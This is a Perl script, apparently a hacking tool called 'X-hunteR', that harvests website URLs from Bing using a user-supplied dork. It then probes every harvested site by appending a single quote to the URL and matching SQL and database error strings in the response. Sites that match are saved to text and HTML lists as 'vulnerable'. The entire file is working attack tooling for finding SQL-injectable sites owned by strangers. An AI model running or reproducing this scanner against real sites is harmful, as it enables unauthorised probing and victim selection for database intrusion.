#!/usr/bin/perl
#sc0rp@hushmail.com
use LWP::UserAgent;
use HTTP::Request;
use Term::ANSIColor;
my $ua = LWP::UserAgent->new();
$ua->timeout(7);

system "clear";
print color("yellow"), q{
____  ___         .__                  __        __________ 
\   \/  /         |  |__  __ __  _____/  |_  ____\______   \
 \     /   ______ |  |  \|  |  \/    \   __\/ __ \|       _/
 /     \  /_____/ |   Y  \  |  /   |  \  | \  ___/|    |   \
/___/\  \         |___|  /____/|___|  /__|  \___  >____|_  /
      \_/              \/           \/          \/       \/ 

},color("reset");



open(clear,'>search-dump.txt.clear'); #deleting previous cleaned search results
close(clear);
open(dork,">search-dump.txt"); #deleting previous search results
close(dork);

print color("red"),"type in a dork",color("reset")," ex:(news.php?id=), ex:(site:pt noticias.php?id=)\n";
print color("red"),">>>\n",color("reset");
   $dork = <STDIN>;
     chomp($dork);
     
print color("green"),"file to save de vulnerable sites",color("reset")," ex:(vul.txt)\n";
print color("red"),">>>\n",color("reset");
   $file = <STDIN>;
     chomp($file);
     
open(clear,">$file"); #deleting vul result file if the input is the same one
close(clear);
open(clear,">$file.html"); #deleting vul HTML result file if the input is the same one
close(clear);


print color("green"),"Search initialized",color("reset")," stand by\n";

for ($i = 0; $i < 10000; $i += 10) {
     $useragent = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
     $useragent->timeout(10);
     $useragent->env_proxy;
     $curl = $useragent->get('http://www.bing.com/search?q=' .$dork.   '&first=' . $i . '&FORM=PERE')->content;
     $check = index($curl, 'sb_pagN');

while (1) {
	$n = index($curl, '<h3><a href="');
  
if ($n == -1) {
last;
}

$curl = substr($curl, $n + 13);
  $s = substr($curl, 0, index($curl, '"'));
  
print color("green"), "[+] ",color("reset"),"$s\n";
open(dork,">>search-dump.txt");
print dork $s, "\n";
close(dork);
}

if ($check == -1) {
last;
}
} 
   print "\n";
   print color("Red"),"[INFO] ",color("reset"),"Search Done\n";
   print "\n";
   print color("Red"),"[INFO] ",color("reset"),"Removing Duplicated Lines from dump search\n";
   sleep 2;

my $cleanrthefile = 'search-dump.txt';
my %seen = ();
{
   local @ARGV = ($cleanrthefile);
   local $^I = '.clear';
   while(<>){
      $seen{$_}++;
      next if $seen{$_} > 1;
      print;
   }
}
print color("Red"),"[INFO] ",color("reset"), "finished processing file.\n";
sleep 2;
print "\n";

print color("Red"),"[INFO] ",color("reset"), "Opening search dump to search for",color("red")," vul's\n",color("reset");
print "\n";

open FILE, "<", "search-dump.txt" or die $!;
  my @amount1 = <FILE>;
  my $amount1 = @amount1;
  my $infomsg = "$amount1 uris to test";
   print color("red"), "[INFO]" ,color("reset")," $infomsg uris to test\n";
   print "\n";

$LOGFILE = "search-dump.txt";
open(LOGFILE) or die("Could not open log file.");
foreach $line (<LOGFILE>) {
    chomp($line);              
    my $url = $line."'";
        
    my 	$request = HTTP::Request->new( GET => $url );
	my 	$response = $ua->request( $request );
	
	
			if ( $response->content =~ /SQL/  || $response->content =~ /\/var\/www\// ) {
       open(vul,">>$file");
    print vul $url, "\n";
    open HTML, ">>", "$file.html" or die $!;
    close(vul);
		print color("bold red"), "[+] ",color("reset"), "$url",color("bold red")," is vul",color("reset");
		print HTML "<a href=\"$url\">$url</a>\n";
		
	}
	
	
			elsif( $response->content =~ m/80040e14/i ) {
        open(vul,">>$file");
    print vul $url, "\n";
    open HTML, ">>", "$file.html" or die $!;
    close(vul);
        print color("bold yellow"), "[+] ",color("reset"), "$url",color("bold yellow")," MS DB error detected",color("bold red"), " SQLI possible",color("reset");
		print HTML "<a href=\"$url\">$url</a>\n";
		}	
		
		
			elsif( $response->content =~ m/SELECT (.*) FROM (.*) WHERE/i ) {
        open(vul,">>$file");
    print vul $url, "\n";
    open HTML, ">>", "$file.html" or die $!;
    close(vul);
     	print color("bold red"), "[+] ",color("reset"), "$url",color("bold red")," SELECT FROM WHERE detected",color("reset");
		print HTML "<a href=\"$url\">$url</a>\n";
		}	
		
		
		elsif( $response->content =~ m/SELECT (.*) FROM (.*)/i ) {
        open(vul,">>$file");
    print vul $url, "\n";
    open HTML, ">>", "$file.html" or die $!;
    close(vul);
     	print color("bold red"), "[+] ",color("reset"), "$url",color("bold red")," SELECT FROM WHERE detected",color("reset");
		print HTML "<a href=\"$url\">$url</a>\n";
		}	
		
		
		elsif( $response->content =~ m/(.*) Invalid argument supplied (.*)/i ) {
        open(vul,">>$file");
    print vul $url, "\n";
    open HTML, ">>", "$file.html" or die $!;
    close(vul);
     	print color("bold red "), "[+] ",color("reset"), "$url",color("bold red")," Invalid argument supplied Detected",color("reset");
		print HTML "<a href=\"$url\">$url</a>\n";
		}	
		
				
else {
	print color("green"), "[-] ",color("reset"),"$url",color("green")," not vulnerable",color("reset");
	
	}
	close vul;
	close HTML;
	print "\n";
}

print color("green"),"Vulnerability search done\n",color("reset");
print color("red"),"going to dump only vulnerable sites\n",color("reset");
print "\n";
sleep 2;


open FILE, "<", "$file" or die $!;
my @amount = <FILE>;
my $amount = @amount;

open (CHECKBOOK, "$file");

while ($record = <CHECKBOOK>) {
   print color("red"), "[+] ",color("reset"),"URL seems to be ",color("red"),"--> vul ",color("reset"),"$record",color("reset");
   
}

	
close(CHECKBOOK);
close(FILE);
   print "\n";
   print color("red"), "[+] $amount URLS ",color("reset"),"that seem to be vul \n";
   print color("red"), "[+] ",color("reset"),"vulnerable sites stored in",color ("red")," $file.html \n",color("reset");